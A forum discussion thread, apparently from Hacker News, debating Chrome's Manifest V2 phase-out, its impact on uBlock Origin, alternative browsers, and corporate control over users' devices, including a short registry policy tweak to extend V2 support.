Notably, Firefox is not removing v2 support (at least for now as of March 2024)
> Firefox, however, has no plans to deprecate MV2 and will continue to support MV2 extensions for the foreseeable future. And even if we re-evaluate this decision at some point down the road, we anticipate providing a notice of at least 12 months for developers to adjust accordingly and not feel rushed.[1]
To my knowledge the “big” chrome engine alternatives aren’t either. I know that Vivaldi and Brave plan on keeping around v2 as long as it is economically feasible
Are you certain? The last I heard about it from Vivaldi[0], they were only going to keep the MV2 code around so long as it's in the upstream codebase:
> We will keep Manifest v2 for as long as it’s still available in Chromium. We expect to drop support in June 2025, but we may maintain it longer or be forced to drop support for it sooner, depending on the precise nature of the changes to the code.
Note that June 2025 is the same date Google plans to drop support completely[1].
Vivaldi team does not respond to any comments asking about ongoing v2 manifest support; safe to assume it's gone as soon as it's out of Chromium upstream. Given Tetzchner's continual messaging on how important user privacy is to Vivaldi it seems like a strange decision, but I don't know how much effort would be required to maintain the support. They're a small team, so it would be understandable if they would just say it's too hard, but instead they have avoided the topic entirely, which suggests they agree with the direction.
Well Vivaldi is open source, right? Personally I would be reaching out to Brave, who already plans on maintaining V2 support, and see about a joint venture with a forked chromium.
I was intensely interested in this, and after much reading, here's my best understanding:
Neither Brave nor Vivaldi are proposing to maintain engine support for v2: they both point to the codebase retaining support after Chrome drops support (likely for enterprise) as being the driver of their ability to offer v2. Both say that once those codepaths are removed, so too will v2 support be removed from Vivaldi and Brave.
In case of Vivaldi, it's features like vertical tabs, and extreme customizability for the built-in stuff (for tabs alone the options dialog is like 3 pages of checkboxes for all the various aspects of how they behave).
Also for those who use cloud bookmark/history/tab sync, people might just not want Google specifically to have that data; Vivaldi does its own sync.
I use both Vivaldi, Brave and Firefox, all have their own strenghts.
Brave now has built in vertical tabs as well: https://brave.com/blog/vertical-tabs/
Split screen done well would be a killer feature for me. Last time I looked Edge support was ok, but not great. But what kills Edge for me as a daily driver is the basic usability in managing bookmarks and tabs. It's stop and go for every basic operation like dragging objects while Firefox is simply a continuous flow. Firefox is invisible, Edge just gets in the way all the time.
Otherwise Edge is not bad at all. Chrome without MV2 is dead to me.
People spend a lot of time in the web browser. So yes, they want to have a comfortable experience with it. And those features are deal breakers for a lot of people. So stating that they are not killing features is just unreasonable at best and ignorant at worst.
It is all a gimmick but as long as people are switching to a chromium based browser and not Firefox I'm happy. With that said, I don't know how anyone would trust a small team to build them a secure and safe browser. Chrome is so battle tested at this point and Google puts a lot of resources in maintaining it, they stand to lose a lot more given their scale.
This sounds like Android phone manufacturers making fun of apple for removing the headphone jack and then doing it themselves a year later. Are they seriously going to maintain V2 support for a relatively small percentage of Powerusers which probably are mostly already using Firefox anyways? The point of being economically infeasible is probably in a month or so.
I think it comes down to how aggressive Chrome will be at changing the internal APIs that it uses. They could choose to make it a very expensive patch to maintain. But I think they would have to go out of their way to do that.
That is easy talking as long as it is still a config flag, then after a compile-time flag. Once the internal APIs for MV2 or where MV2 get removed or changed it becomes very difficult to maintain. Never mind the possible security issues you introduce, but won’t get so quickly discovered.
Brave is an odd one. They've publicly stated[1] they plan to support parts of Manifest v2 for a handful of popular addons (uBlock Origin included) by making limited patches, but they make no promises.
It seems Shields was their main focus for MV3 mitigation, much like Vivaldi's now native content blocker made for the same reason (though Vivaldi has said[2] they won't be supporting MV2 past the last Chromium build that includes it).
Yeah that's the problem. I used to be on Brave but having to download v2-only extensions[1] manually from each developer's website was a pain. I am on a Firefox-based browser now and extensions are synced across all my computers and it just works.
While adblocking has gotten most of the focus, it isn't the only functionality that is being limited or made more complicated. One of my favorite extensions is still not available for MV3 because of complications: https://github.com/openstyles/stylus/issues/1430
At least when I last tested, Vivaldi on Android's adblocking is pretty far behind uBlock Origin -- it doesn't get nearly as many anti-adblock interstitials as it should.
For people that have somehow missed the story, manifest v3 removed support for certain powerful network apis, severly limiting ad-blockers capabilities. uBlock Origin will not work anymore without manifest v2 (there's a v3 compatible lite version of uBlock Origin).
It's worth noting that the maintenance of the "lite" version is at some nonzero risk of burnout for its developers, ironically in part due to Mozilla being unnecessarily hostile: https://github.com/uBlockOrigin/uBOL-home/issues/197#issueco... discussed at https://news.ycombinator.com/item?id=41707418 - and while there's no plan yet to discontinue the Chrome MV3 compatible version, there are a million ways that this could go wrong.
My only long-term hope for this space is that a nonzero segment of congressional representatives have had ad blockers installed by their aides, realize that their experience online takes a nosedive when MV2 is discontinued, and calls for hearings! Blocking isn't just about not seeing ads, it's about a user's freedom to set up their "user agent" to preserve their privacy online from sites that don't respect their wishes. That's a right that Google is using its market power to erode, and it's not something we should take sitting down.
> It's worth noting that the maintenance of the "lite" version is at some nonzero risk of burnout for its developers, ironically in part due to Mozilla being unnecessarily hostile:
Why would you even use the lite version on firefox when the original works?
I'm doing all my banking in a separate Firefox profile where uBlock Origin Lite is the only installed extension. So there a zero extensions that have permission to access the pages or requests.
Of course I'm still using the normal uBlock Origin in my main browsing profile.
Yup, the MV3 version requires zero permissions and in theory should be faster. These are real benefits that for some reason nobody will admit exist.
Saying anything positive about MV3 or the lite extension seems to get you downvoted without explanation though, which is a nice example of how absurd this site is when it comes to anything related to Google.
Sometimes I think downvoting should require leaving a comment and reason, because I can't see any reason to downvote this other than "google bad".
I get the security benefits, but the performance benefits seem weak. Won't the benefits of not having to run as much js to do the filtering be cancelled out by having the run additional advertising code that isn't being blocked by the lobotomised adblockers?
and just conveniently, X has some features that the owning company doesn't like as it is antithesis to their business model. Therefore, by replacing X with Y, and touting some performance improvements (which is real, but marginal), they get to remove X with plausible deniability.
People talk about the upside of the declarative API plenty, but adding one function doesn't mean removing another, and the conflation required to use that as a defense of google is what gets downvotes.
Is uBOL as ad-removing and privacy protecting as uBO?
We aren’t talking just an extension here. If it didn’t exist, that would make web browsing insufferable to many. It is a part of web browsing itself. Let me put it as clearly as it can be:
***
uBO is a Holy Grail and gorhill is our Jesus Christ.
***
If MV3 (and further development) tries to touch it in any inappropriate way, comments promoting it deserve 5x downvote mutiplier without the usual -4 limit.
The "original" UBO is basically the mother of all supply chain vulnerabilities and whenever the inevitable exploit happens, everyone who thought they were a connoisseur of privacy is going to get completely pwned. UBO Lite works without being a gigantic security vuln.
The "original" Chrome is basically the mother of all supply chain vulnerabilities and whenever the inevitable exploitation happens, everyone who thought they were a connoisseur of security is going to get completely pwned.
Some people may think what you're saying is outlandish, but it's worth remembering that this is pretty much what already happened to Ublock (which led to the forking of Ublock Origin and return of gorehill)
Not saying it cannot happen, but in Firefox, it is a “Recommended“ extension which gets reviewed per release. A sophisticated attack could slip through, but a ham fisted takeover is unlikely.
It's also worth mentioning that Firefox doesn't force you to auto-update add-ons, but Chrome/Chromium do. (There was a hack workaround to keep Chromium from updating, but I forgot what it was or if it still works. It wasn't a trivial option in the browser itself like it should be.)
I use a certain extension. An update turned the extension into payware, locking 90% of the features behind a paywall. So I refuse to update it and instead continue to use the revision that still has all the original features. I would be absolutely incensed and outraged if my browser insisted on forcing me to update this extension!
Surely there are better ways for a developer to make money off of an existing extension without suddenly locking previously available functions behind a paywall. Perhaps instead paywall NEW features? Or ask for donations?
To be honest, the reason I mentioned it at all was because I do the same thing with the same word so it was as much of a comment for your benefit as it was for my benefit haha.
I imagine the focus of the developers will very quickly shift to Lite once Chrome flips the switch and 95% of uBO's user base disappears overnight. It might not be what they want, but such events have their own dynamic.
95% of the user base going away just sounds like less support work for gorhill. This isn't a VC-backed startup or ad platform that needs users to survive.
"Based on input from the extension community, we also increased the number of rulesets for declarativeNetRequest, allowing extensions to bundle up to 330,000 static rules and dynamically add a further 30,000."
https://blog.chromium.org/2024/05/manifest-v2-phase-out-begi....
So because you don't understand it, its rumors? A Simple google search would answer all of your questions in a literal sentence. It removes APIs used by ad blockers.
"browsers using the ExtensionManifestV2Availability policy will be exempt from any browser changes until June 2025"
To extend ManifestV2 in Chrome, add the text below to a text file, saving and running it as a .reg will create and add a value of 2 to "ExtensionManifestV2Availability" in the HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
(When you open/run a .reg file, it updates your registry, usually preceeded by a warning.)
Alternatively, you could do this manually by pressing the Windows key, type "run" (without the quotes) and enter, type "regedit" (without the quotes) and enter, then navigate as far as you can to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
You may find there is no "Chrome" key and will need to create it, as well as creating ExtensionManifestV2Availability
Note that this will also disable Chrome’s DNS Over HTTPS as Chrome disables the DoH resolver by default when the browser is managed by enterprise policies like this one. See the platform-specific links mentioned on the uBlock Origin subreddit [1], many of which also include instructions for enabling the DoH resolver while managing the browser using policies.
And IIRC including the quotes in a filename in a save dialog, líke "manifestv2.reg" (incl quotes), will save it with the extension you typed, so you won't end up with 'manifestv2.reg.txt'. So you skip a potentially otherwise needed rename step.
Wow, thanks for this tip. Saves the effort of having to manually find "all types" in the drop down... this is so much easier.
Also, just for clarification:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
"ExtensionManifestV2Availability"=dword:00000002
Apparently, the line Windows Registry Editor Version 5.00 is necessary at the beginning of the .reg file. This line indicates the format version for the registry file and tells Windows that it is compatible with the current registry editor (according to GPT). This worked for me.
Sure, but we saw this coming a mile away (as in, people have been saying this about Chrome for about a decade). People--especially tech nerds--didn't have to switch to the closed source, conflict-of-interest, browser. But, everyone did, and this is what we get for it. We now have proprietary DRM built in to the web standards, and all kinds of other bullshit, because a bunch of people decided to not learn any lessons at all from Microsoft and Internet Explorer.
But, every time Mozilla does something slightly abrasive, HN users pile on about how Mozilla is ruining their privacy-respecting reputation, and then go back to using Chrome... The double-standard is really something else.
Maybe instead of getting someone else to break up Google for us, we could just... stop using their shit? I'm typing this from Firefox, I use Proton Mail (and pay for it!) for email, and I mostly search with DuckDuckGo (I know that's not perfect, either). I certainly don't feel like I'm living like a caveman...
> People--especially tech nerds--didn't have to switch to the closed source, conflict-of-interest, browser.
Do you not remember all the ads promoting chrome? First was chrome-frame IE extension, then came all the ads - then tie-ins where you got Chrome in addition when you really wanted some other app.
They pushed it hard because they knew they had no real competitors and could eat up marketshare.
Chrome won because it was more performant (read: only point of interest for Joe Average) and it was modern and cool (read: only point of interest for nerds).
Firefox failed because it stagnated on performance and code quality (read: memory leaks for daaaaaaaaays) and ultimately because Mozilla was corrupted by Mitchell Baker and still is to this very day driving away nerds and engineers by the truckload.
Lest we forget, Internet Explorer lost to Firefox despite bundling with Windows. Edge still loses to Chrome despite bundling with Windows. Safari despite bundling with iOS and MacOS only survives thanks to the Walls of Applestantinope holding against the SelEUk Empire's onslaught.
> Chrome won because it was more performant (read: only point of interest for Joe Average)
It's hard to argue chrome won on merit here when they were using their monopoly to actively sabotage users running firefox on the most popular sites.
> YouTube page load is 5x slower in Firefox and Edge than in Chrome because YouTube's Polymer redesign relies on the deprecated Shadow DOM v0 API only implemented in Chrome
Yeah that's last part is funny but pretty true. I had always used Safari (basically since they replaced Internet Explore for Mac with it) but it became much less performant and had many annoyances regression (like the favicons in bookmarks).
Still, I kept using it but what make me switch to Chrome a few years ago (about 2) was a bug preventing proper password sync with my iPhone (acquired from a beta testing I believe, some got it successfully resolved by contacting support but I can't be arsed, they should just have a reset everything option, including their cloud thingy).
Hilariously since you can use Chrome password manager on iOS, it became a better solution overall than trying to stick with Apple mess. With it I got support for uBlock Origin (nothing is as good for Safari, and it came to a point where I just couldn't deal with the ads anymore) and a much faster/more modern browser. As a bonus, it syncs everything with my Windows installation much better and I can use my Chrome profile on other computers when I need to.
But when uBlock Origin is not supported in Chrome anymore I'll probably revisit the choice for something else.
Apple has completely lost the plot, pushing their half-assed, barely work, cloud stuff while simultaneously raising the price of entry/maintenance of their hardware.
This is why I laugh my ass choice when they brag about their privacy bullshit. If they have wanted, they could have very well figured out a sync without relying on any cloud stuff; instead, they push iCloud to make more money (it's a crutch for people with iPhones that have way too little storage and other proper computing device) even though it makes no sense for what was the philosophy of Apple software/hardware previously.
They have no competitive advantage in this matter and it often just sucks or doesn't work properly.
Google spent astronomical amounts of money advertising Chrome, including pushing Chrome from literally priceless Web real estate like the Google start page, bundling deals with e.g. Flash, and preinstalls on various desktops and laptops. It really is hard to say what would have happened without that advantage.
Google made something better than what existed with Chrome, it was obvious it would capture the market significantly especially among more technical people.
I don't think the fact that Chrome is (was) better is the question, it's a question of how they got here.
Google took tons of money and threw it into Chrome and therefore developed something better. It's better because Google put more money into it than anyone else would have because, in the absence of considering using it to enshrine their search and ad revenue, it wouldn't make sense.
It was only true that Chrome was significantly superior (performance-wise, anyway) for a little while. Firefox had to play catch up and it took several years. It was (mostly) called the "electrolysis" (a.k.a., "e10s") project. It was considered complete by 2018, and had already offered significant performance and stability improvements for years before then.
I wouldn't be surprised if Chrome still performs better on Google-owned web sites, for obvious reasons. But, nobody is really going to notice a difference between Firefox and Chrome when visiting, e.g., your bank's web site.
So, it's been somewhere between six and eight years that Firefox has had comparable performance, comparable web dev tools, and way cooler extensions. I'm sure plenty of people will reply that this isn't true and there was some website just this week that FORCES them to stay with Chrome because they noticed a jitter once, but people on the internet are top-tier experts at rationalizing and I don't buy it.
We could've all jumped on board with Firefox when the e10s project landed, but nobody did because it was just slightly less convenient to switch than to not. I hope it was worth it for them.
> I wouldn't be surprised if Chrome still performs better on Google-owned web sites, for obvious reasons.
Most websites (except for those doing some really fancy stuff with new experimental web apis) tend to work just fine in Firefox. Google's sites are the only ones I regularly encounter that perform terribly and leak memory continuously.
The one that is the worst for me is Google Cloud console. It takes tens of seconds to update page state when trying to create or edit resources in Firefox, especially anything in Compute Engine. Chrome feels reasonably snappy, at least as good as AWS's console. I'm not sure who is to blame for that but I use `chrome-new` to log into Google Cloud when I need to.
Chrome had better stability (not sure about performance) for nearly a decade - far more than "a little while". I gave Mozilla 3-4 years to catch up before finally switching to Chrome.
Even once e10s supposedly fixed their problems another 4 years down the road, I didn't see any reason to rush back. I've switched to another Chromium browser, but I'd rather try a new engine entirely like Ladybird than switch back to Mozilla, until they prove they're not going to let the browser stagnate for so long again.
This is the double standard I'm talking about. First, I honestly don't even believe your claim that Chrome was more stable than Firefox for a decade.
But, even so, you basically admit in the second paragraph that they're probably both fine, but you won't switch back to Mozilla "until they prove they're not going to let the browser stagnate for so long again." What the heck kind of test is that? And how long, exactly, will that take for you? If they "stagnated" for a decade, according to you, is it going to take another decade to prove they won't let it stagnate? Two decades, maybe? What does "stagnate" even mean? To me, it looks like Chrome is stagnating- what have they done lately that's innovative and actually good for users? Breaking a bunch of extensions and removing the ability to block ads? How many years does Chrome have to start behaving itself before you'll switch back to it after all of this? Ah, right- you won't switch away from it; you're probably only concerned about Firefox stagnating.
The truth is that you'll always make an excuse to not switch away from Chrome (and yeah, a browser that uses the Chromium guts is effectively the same thing when it comes to the monopoly on web standards).
Imagine browsing the web without an adblock. A single ad can consume 1GB in 5 minutes on my mobile phone. The CPU will be super slow. We often underestimate the loss of performance that ads represent.
I criticise Mozilla in tech circles, I recommend Firefox and a working adblocker to friends and family, and I donate to Ladybird. What else should I be doing?
That's it, I think. I think as long as enough of us actually do that, it'll make a difference. People seem to think that you need 50%+ of the users to "rebel" for there to be change, but the truth is that not all "users" are created equal. Developers, tech supporters (personal or professional), and "power users" matter more than typical users because it's our feedback, contributions, and demands that keep pushing these products forward. The "normies" will use whatever you put in front of them and they won't know or care that something could or should be different. If the nerds leave, the product will stagnate and other options will pick up steam.
unfortunately, there's not much else you get to do. With the exception of the anti-trust suits on google coming out with a decent outcome (which i wouldn't hold my breath for), there's little that individuals can do to push back against google's might.
If you're in a position of power in a corporation to dictate software usage, consider making firefox the default choice.
There's still hope. I would like to draw a parallel to Microsoft Windows, with my own narrative added over.
Tech nerds mostly knew that Windows was not a good server operating system. It was also not a fantastic software development environment unless you were using a big, all-inclusive, IDE that was probably aimed specifically at developing Windows libraries and applications.
But, Windows was (and still is) the choice for normies by a WIDE margin.
The tech nerds continued to mostly ignore Windows for server stuff, and more and more ignored it for other dev stuff, too (many migrating to Macs, some to Linux, etc).
If you have a lot of users, but no developers on your platform, you're playing a dangerous game. Eventually Microsoft found a way to have Linux running in Windows. I don't know or care if that "saves" Microsoft or Windows or whatever, but I do see that as a win for the tech nerds.
All we have to do is get the tech nerds to stop using Chrome. Chrome can't survive forever if the nerds stop using Chrome, if we stop optimizing our web pages specifically for Chrome, and if we stop writing and maintaining extensions for it.
Eventually, they'll probably cave and put back more stuff to make the nerds happy, in order to bring them back to the platform and save their normie userbase. Either that or Chrome will die. Both are fine with me.
With the path Apple/Google are taking it looks like Microsoft will be the best bet for quite a while still.
The thing with Microsoft is that while they lack taste and have some nasty corporate behavior, they are less greedy than the others and are willing to work with their customers more, respond to needs/demands better.
Oh, and they don't try to have a captive hardware market, that is a massive plus.
The reason the "normies" "choose" Microsoft is because it's the only choice that make somewhat sense from a financial standpoint if you don't care that much.
There is a whole mythology about Apple hardware lasting longer and all but, in my experience, the reverse is true and you get much more for your money if you opt for a standard computer that happens to come with Windows.
Linux would have a fight chance with better hardware/software support but dev/manufacturers can be arsed because it's a chicken and egg problem (there are also too many variations of what is Linux, so that doesn't help).
With the iPhone success, Apple had a chance to gain market share for "real" computer in a way that would have long lasting effect both for business and consumer support, instead they went full greed mode and found many clever ways to close even more a platform that was already not the most open, while had the same time selling weak computer that are clearly lacking for the price, very often with terrible engineering decision (like their new Apple Silicon iMac, already having issues, less than 4 years after release, what a joke).
> All we have to do is get the tech nerds to stop using Chrome. Chrome can't survive forever if the nerds stop using Chrome, if we stop optimizing our web pages specifically for Chrome, and if we stop writing and maintaining extensions for it.
Meh, the "slightly abrasive" stuff Mozilla is doing is stuff like buying up ad analytics companies and adding features to help ad tracking companies track users. Fuck Mozilla, and fuck Google even more.
I admire your optimism by the way that a few technologists saying "stop using Chrome, Google is evil, use Firefox" is enough to overcome the market dominance of a monopoly like Google's, but I sadly don't share it. People have been saying it (and similar things, like "don't use Windows, Microsoft is evil, use Linux") for decades with little success. Even the few people who do get swayed will switch back after a few instances of "I was late for my important meeting/was unable to open this important document because the website didn't work with Firefox".
Most people's tech choices are deeply pragmatic and based on familiarity. And to expect anything else is honestly foolish, in my opinion.
This is coming from a Firefox and Linux user by the way.
I was going to make a joke about giving Firebug a look but (TIL) Firefox's Devtools actually subsumed Firebug a few years back. That's pretty cool and a nice note for that project to end on.
They make it sound nice, but the last release of Firebug was after that page says they were unified, and only about half a year before Firefox Quantum removed XUL, which would have killed Firebug anyway. I was still using Firebug because its console was still better than the built-in devtools.
I use a little `chrome-new` script to develop (and sometimes take video calls or use buggy apps) against a totally clean fresh Chrome profile, then I use Firefox with uBlock Origin and uMatrix for daily driving.
The first line lets me override which Chrome version I launch if I want to try instead google-chrome-stable or google-chrome-beta for example. I keep them all installed from the AUR on Arch.
Better just use 'HOME=$TMPDIR chrome <args... > without the export. With export the Home variable will persist for the current shell, potentially leading to unwanted results.
What makes them less good? I'm used to Firefox and while the Chrome devtools have more features they're harder to use (eg smaller touch targets, can't accept JS suggestion with enter key)
I use FF and my coworker uses Chrome. He says the thing that pisses him off the most when watching me use FF is that there is no fuzzy search when manually applying styles. I.e. you have to search "justif..." to see "justify-self". You can't just search "self". That's the only example I've really noticed between the two but I'm sure there are more. It doesn't bother me enough to change though.
I know chrome dev tools are capable, but to me they feel much more dumb and convoluted. There's lots of convenience and golden nuggets in Firefox dev tools that makes you feel they've been designed by and for developers.
My needs for webdev debugging have always been satisfied by Firefox, but last time I was really in the weeds ~4 years ago I had the feeling both it and Chrome were still missing things I took for granted with Firebug long ago.
I don't mind nice and powerful tools, but one thing I learned with Java (where the tools are so much nicer and so much more powerful) is that if you're leaning on them heavily, that's kind of a sign you've messed up. Like on the scale of severity (https://raw.githubusercontent.com/matthiasn/talk-transcripts...), at least as severe as really bad coupling or brittleness. Thank goodness for the tools that let people efficiently figure things out and get on with things, but it's really better to have not needed to be in such a situation to begin with.
I have a similar view with valgrind -- amazing tool everyone would rather exist than not, one could imagine a "Google Valgrind" and "Mozilla Valgrind" competing on mild differences of amazing, but really, life is better if you can just use a managed language and never have to deal with any flavor of valgrind. I think there are ways to do webdev that significantly reduce the need to use any browser dev tools at all, though the domain necessitates some use. ClojureScript in 2014 was showing the way.
Hopefully this is the inflection point for Chrome. Despite all their made-up "security" reasons, everyone knows this is solely about making adblock less effective. For many users, adblock is what makes chrome bearable - and if they make it unbearable, then those users will leave. Slowly but surely.
Google seems much too sure of itself making this change. I hope their arrogance pays off just the same as Microsoft's did with IE.
Agreed on hoping this is the inflection point, but only partial agreement that it's about adblock. For sure Google wants adblock to die, but I think it goes even deeper than that.
I think it's part of a much bigger trend in tech in general but also in Google: Removing user control. When you look at the "security" things they are doing, many of them have a common philosophy underpinning them that the user (aka device owner) is a security threat and must be protected against. Web integrity, Manifest v3, various DoH/DoT, bootloader locking, device integrity which conveniently makes root difficult/impossible, and more.
To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in. The next generation won't have the wonderful and fertile computing environment that we enjoyed, and it's (partly) your fault.
It is important, I think, to understand that personal computing is just one part of the picture. "Enterprise" environments (governments, businesses, large organizations, etc.) have demanded many of these "features" even before Google started implementing them. Your workplace, by and large, does not want you, the replaceable person who happens to be sitting at the keyboard, to be in full control of the device that they own and which is connected to their network. Often this is made more explicit by the device just being a "thin client" or other totally locked down narrow viewport to some other computer you can't even touch. It sucks and the general trend of workplaces trusting their employees less and less has been demeaning and degenerative to the point of often fostering self-fulfilling prophecies of mistrust (don't trust anyone => get untrustworthy people => bad things happen => don't trust anyone => ...).
However, it is important to also understand that the employee is not the only stakeholder. Government agencies answer to legislators, nonprofit management answer to donors, corporate management answer to investors, etc. There are layers of compliance that must be considered as well (internal policies, external regulations, different insurance costs, etc.). It is unsurprising that these fewer but generally deep-pocketed entities have an outsized influence on the market compared to more numerous but less moneyed end users. If you refuse to serve the former, you may quickly find yourself out of business.
Then they could have made Mv3 an option to turn on by sysadmins who lock down their browsers. If you aren’t locking down your users browsers then that’s on you. I mean at worst they could have made mv2 opt-in and most people would have highly curtailed their complaints of “I’ll jump ship to _____________” . People don’t like it when features are removed especially when there are viable alternatives like, adding a special tier of review to get mv2 approval for your extension, opt-in/out as discussed, easy access by sysadmins to turn it on/off. Instead google pulled a bully “so, pencil-neck, what are you gonna do about it?” instead. They are tone-deaf and see themselves as the new 800lb silverback on the block.
I was mostly commenting on the "broader trend" aspects and the assignment of primary blame to implementing engineers.
There's another problem with Chrome, which is that nobody is actually paying for it. So the big corps move features along there only in the sense that they won't adopt it or will drop it otherwise. I don't think the big corps are pushing for Mv3 but they also probably don't care that it arrives either. Conversely, I wager Google estimates nearly nobody will revolt and leave Chrome over the loss of Mv2. It hurts ad-blocker developers and it hurts the most conscious users, but Chrome is a marketing product targeted at mass adoption first and foremost. I personally hope their estimation is wrong and the current browser monopoly breaks, but this may not yet be the breaking point.
Even if that happens, Chrome eagerly adopting enterprise policy support may keep it on life support in that environment, though.
Well to some extent they did make it Mv3 an option, not forever but for an extra few months, with that enterprise policy flag. Enterprises used their weight to demand not a more secure browser, but an extra flag to allow them to keep running old software longer. Enterprises too are treated as a security threat by Google, who still plans to depreciate Mv2 format, forcing them to move to "more secure" extensions.
A lot of enterprises run MITM on all HTTPS connections and can just block the ad-serving domains or even remove the ads from the page without any help from the browser. Ad blocker extensions are a low-infrastructure solution that's more useful for home users and small companies.
The technologies themselves are mostly a good idea. The problem is that the companies designing them also like to abuse them.
Take, for example, hardware attestation on android. There's not really any serious issue with this feature, it can be used to ensure your device is not compromised. This is for example how GrapheneOS enables its use with the auditor application.
But, on the other hand, Google abuses the feature to ensure that you are running a google signed OS if you want to use Google Pay. Meanwhile you can use banking apps which also use hardware attestation (although, from their perspective, they don't use enough of it to ensure it isn't being spoofed, and even then...) without any problem on GOS. Moreover, before Google Pay completely killed all of its competition, it was possible to even find third party banks which would provide you with the ability to pay with your phone without using google pay.
Likewise, secure boot is a great concept if you want to be more sure about the integrity of your laptop throughout its lifetime. But some companies have abused it to force you to use Windows. If you want to set up your own signing keys for secure boot, you end up having to deal with poorly managed UEFI keys from third parties which weaken the security of your machine. The feature, as it's implemented, is rarely designed with helping end user's secure their machines. But the core of the design is fine.
I think limiting root on a phone is also a really good idea, the issue is that Google likes to give themselves and their "system apps" special privileges. If APIs were exposed to allow you to bless your own applications with the right permissions, you would probably not care so much about root restrictions.
So all in all, fundamentally, most of these features are fine. They're genuinely great for security. But the main problem is how they're abuse by the companies in control and how little effort is put into allowing power-users to use those features for their own benefit.
No disagreement here, although if past experience has proven anything I think it's that companies will abuse whatever "security features" they can to accomplish their objectives. It reminds me a lot of the old adage, "the same wall can keep people in just like it can keep people out."
When the OS is fundamentally in the user's control, they are limited in what they can do, but when the OS disregards it's owners preferences/desires and enforces it's creators desires.
Minor thing actually:
> If APIs were exposed to allow you to bless your own applications with the right permissions, you would probably not care so much about root restrictions.
I absolutely agree with this in theory, but in practice I'm not sure it would ever work because they just aren't going to put in the work to build and maintain APIs for things they don't care about, and there would be a very long tail of things to do (and sometimes those things are legitimately a lot of work). Call recording being a classic example.
But all in all, I very much agree. I love those features when they are in my control on my devices. Biggest issue is, they virtually never are and the number of occurences is trending down.
> I absolutely agree with this in theory, but in practice I'm not sure it would ever work because they just aren't going to put in the work to build and maintain APIs for things they don't care about, and there would be a very long tail of things to do (and sometimes those things are legitimately a lot of work). Call recording being a classic example.
I thought about this a bit and I think that at the end of the day, the entire OS is just a bunch of these APIs. And I do think there's even a market for these APIs, they just don't want to set that precedent, I don't think it has anything to do with it being a lot more work than anything else they expose. They already have some very privileged APIs you can bless some apps (e.g. think of MDM) except not for everything and in the case of the MDM APIs it's very difficult to use it as a normal end-power-user.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
I recently quit my job, developing among others the means to "protect" media using DRM. While this was not a primary motivation, I'm glad to somewhat clean my hands.
The technology (dubbed Common Encryption) is a bunch of smoke and mirrors that a childishly easy to hack around. Yet clearly aimed against good faith consumers.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
That was a world where the user base was much more limited and devices were less capable. Now we have children, grandparents, educated, and uneducated users with access to web connected devices. These devices now contain everything about you. Compromise of a device can destroy someone’s life.
Not only that, but compromise of a device can cause collateral damage to other devices on the same network.
We now have to cater to every user. Not just to the technologically adept. Look at what people believe on social media. The bar is so low to con people into compromising their device.
Write insecure software and you'll get screwed by hackers. Write secure locked down software nobody can touch or modify, and you'll get doubly screwed by a large corporation that wants to pound every penny they can out of your bloody corpse, upto the point your device is compromised by the corporation who can do whatever they want, but you cannot tell.
There is no win situation here, there are only trade offs.
Still a shit poor pathetic excuse to screw over the userscript/grease monkey users.
The browser is called a user agent, but this shift to absolute security no matter what, no say about it is a shift to native apps, is a shift to the developer is in control, is a shift to this being Google and the sites browser, not ours, and that being done unilaterally with nearly no opt outs is the sort of mega tectonic shift that ruins this magical special unique place in software where users had some say in what was happening. We cannot pander to imagined ever worsening users forever.
It feels like the things being done in the name of security are really building an immense prison. The work being done to allow verified age and identity checking ranks up there highly in the this corals humanity, area, not giving us agency.
> Still a shit poor pathetic excuse to screw over the userscript/grease monkey users.
Tampermonkey still works fine with MV3
> We cannot pander to imagined ever worsening users forever.
The most popular software/hardware will always pander to the most users. That’s why they’re the most popular.
You can’t complain about the most popular option pandering to the most users. Well, you can complain, but you might be in the minority of the users.
> It feels like the things being done in the name of security are really building an immense prison.
I get that, but we are running so much untrusted code on our machines now. Applications that use thousands of dependencies with the hope that someone spots a bad actor.
The prohibitions against running code dynamically are quite severe. It took a long long time & there's some work to make sure userscript/contrntScript extensions aren't totally shit out of luck (after years and years of delay & nothing), but whole domains of extension - anything where you run code on the fly - have been outlawed.
> Compromise of a device can destroy someone’s life.
So in order to prevent a hypothetical hacker bogeyman from getting our data we gladly entrust it to corporations that actively squeeze every possible cent out of it by, among other things, giving access to it to other corporations and uncountable "partners" that will feed us content with the goal of psychologically manipulating us into buying things we don't need, or thinking things someone else wants us to think, destroying the very fabric of society in the process.
I somehow find all of that delusional, our acceptance and support of it nightmarish, and trust hackers to be less diabolical in their schemes.
Computers should serve us, not the other way around. The solution to these problems is tech education, not tech babysitters.
I get why they built in all of those protections; the vast majority of tech users are not knowledgeable about the details of the stuff they use. And I think a big chunk of those that are, overestimate their own abilities, knowledge, and control. They all need to be protected against themselves.
That said, I don't like that the choice is being taken away. If you do want to tinker at that level with the technology you own, you should be given the choice. By all means make it not obvious how to get there - like, have people reboot their computers while playing Twister on their keyboards with interesting key combos, but give them the option.
yes, iOS now restricts Apps from getting blanket access to their contacts, photos, and even clipboard. On the one hand, it does protect the user from malicious Apps that trick users into giving blanket access. On the other hand, they could have atleast done it like location access - where user still has an option to give blanket access. It is not fair that Siri is the only one that can access these things now.
That's literally how iOS works today. If I go into Settings > Privacy & Security > Photos, I can give apps None, Limited Access, or Full Access. Same with Contacts, same with the clipboard (where the per-app choices are Ask, Deny, or Allow).
> It is not fair that Siri is the only one that can access these things now.
You should stop seeing the Browser as a software as a program that's controlled by the user. This idea was over when Microsoft started to display ads in the file manager program (explorer).
The modern Web Browser is an advertisement terminal. If Google would manage to eliminate having to serve content, they would certainly do it.
Their incentive is really to make the Chrome Web Store a tractable problem with minimal human effort. That's about 75% of the incentive. You can't actually make any guarantees at the CWS level regarding safety of audited code if the API allows audited code to execute non-audited code.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
